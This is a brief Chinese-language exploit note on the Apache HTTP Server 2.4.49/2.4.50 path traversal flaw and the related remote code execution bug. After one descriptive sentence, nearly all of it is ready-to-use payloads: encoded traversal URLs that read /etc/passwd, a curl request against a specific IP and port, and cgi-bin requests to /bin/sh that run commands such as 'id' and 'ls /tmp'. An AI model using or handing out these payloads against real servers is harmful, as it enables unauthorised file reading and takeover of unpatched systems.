Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
payload:
1:get:在url后面加上
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
2:Linux :
curl -v --path-as-is 'http://123.58.224.8:57446/icons/../../../../../etc/passwd'
目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
远程代码执行:cve-2021-42013
bp抓包
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
或: POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;id
echo ; ls/tmp
linux:
curl --data "echo;ls /tmp" 'http://目标IP:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'